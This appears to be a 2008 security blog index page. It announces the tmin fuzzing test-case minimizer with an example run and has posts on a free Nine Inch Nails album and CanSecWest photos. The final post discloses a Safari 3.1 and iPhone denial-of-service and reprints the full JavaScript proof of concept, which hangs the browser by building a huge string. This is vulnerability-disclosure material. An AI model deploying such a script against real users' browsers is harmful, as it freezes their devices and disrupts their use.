Tmin fuzzing test case optimizer released

May 6, 2008 · Filed under Fuzzers

Tmin is a quick and simple tool to minimize the size and syntax of complex test cases in automated security testing.

The tool is somewhat related to delta, which is a more featured general purpose optimizer but is meant specifically for dealing with unknown or complex data formats (without the need to tokenize and re-serialize testcases), for hands-off detection of security fault conditions, and for easy integration with UI testing harnesses.

tmin is also capable of reducing the complexity of alphabets used on datasets that cannot be further trimmed down in size.

Below is an example run of tmin:

$ cat testcase.in
This is a lengthy and annoying hello world testcase.

$ cat testme.sh
#!/bin/bash

grep "el..*wo" || exit 0
exit 1

$ ../tmin -x ./testme.sh
tmin - complex testcase minimizer, version 0.03-beta (lcamtuf@google.com)
[*] Stage 0: loading 'testcase.in' and validating fault condition...
[*] Stage 1: recursive truncation (round 1, input = 53/53)
[*] Stage 1: recursive truncation (round 2, input = 27/53)
[*] Stage 1: recursive truncation (round 3, input = 14/53)
[*] Stage 1: recursive truncation (round 4, input = 10/53)
[*] Stage 1: recursive truncation (round 5, input = 8/53)
[*] Stage 1: recursive truncation (round 6, input = 7/53)
[*] Stage 2: block skipping (round 1, input = 7/53)
[*] Stage 2: block skipping (round 2, input = 6/53)
[*] Stage 2: block skipping (round 3, input = 5/53)
[*] Stage 3: alphabet normalization (round 1, charset = 5/5)
[*] Stage 3: alphabet normalization (round 2, charset = 5/5)
[*] Stage 4: character normalization (round 1, characters = 4/5)
[*] All done - writing output to 'testcase.small'...

== Final statistics==
Original size : 53 bytes
Optimized size : 5 bytes (-90.57%)
Chars replaced : 1 (1.89%)
Efficiency : 9 good / 49 bad
Round counts : 1:6 2:3 3:2 4:1

$ cat testcase.small
el0wo

Download:
http://code.google.com/p/tmin

Usage:
http://code.google.com/p/tmin/wiki/TminManual

Comments

NiN Gives Away Full Length Album - The Slip

May 5, 2008 · Filed under Misc, News

Nine Inch Nails is giving away their new album for free entitled The Slip, exclusively from NiN.com. The album is available in a variety of formats including high-quality MP3, FLAC and or M4A lossless at CD quality and even higher-than-CD quality 24/96 WAVE.

Click on the link below to your copy:

http://dl.nin.com/theslip/signup

Comments

Fortify: The New Face of Cybercrime

April 30, 2008 · Filed under Misc

Comments

CanSecWest 2008 Photos

April 4, 2008 · Filed under Misc, Photos

I finally got around to posting the shots I took while I was in Vancouver, British Columbia for CanSecWest 2008. This was my first time going to CanSecWest and I must say it was a great conference. It doesn’t have all of that hype and BS like BlackHat does.. Ill defiantly be going next year.

CanSecWest 2008 - Vancouver, BC

Full photo set here:
http://flickr.com/photos/tomferris/sets/72157604376917452/

Comments

Safari 3.1 JavaScript DoS Released

March 19, 2008 · Filed under Apple, Flaws, iPhone

Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 which causes the browser to hang, and not crash. This DoS also affects iPhones running firmware version 1.1.4 and, all other earlier versions.

When visiting a site with the malformed JavaScript, the iPhone will lock up becoming causing the user to have to reboot the phone. The current workaround is to disable JavaScript on your iPhone and or iPod touch.

Below is the source of PoC which will trigger the hang (not a crash).

Copyright Georgi Guninski

Cannot be used in vulnerability databases

Especially securityfocus/mitre/cve/cert
SCRIPT
var s=String.fromCharCode(257);
var ki=”";
var me=”";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;

alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
SCRIPT

Comments (4)

« Previous Entries